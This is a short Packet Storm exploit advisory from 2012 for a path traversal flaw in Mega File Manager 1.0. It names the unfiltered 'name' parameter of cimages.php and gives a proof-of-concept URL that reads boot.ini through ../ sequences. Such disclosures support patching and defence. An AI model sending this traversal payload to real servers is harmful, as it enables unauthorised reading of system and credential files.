Mega File Manager 1.0 File Download

2012-04-23T00:00:00
ID PACKETSTORM:112095
Type packetstorm
Reporter i2sec-Min Gi Jo
Modified 2012-04-23T00:00:00

Description

                                        
                                            `# Exploit Title: [MegaFileManager FileDownload Vulnerability  
# date: 2012-04-19  
# Author: i2sec-Min Gi Jo  
# Software Link: http://www.awesomephp.com/?Download*5  
# Version: Mega File Manager V 1.0  
# Tested on: Windows  
  
# Description : There is no filtering on 'cimages.php' parameter 'name'.  
  
# PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini  
  
`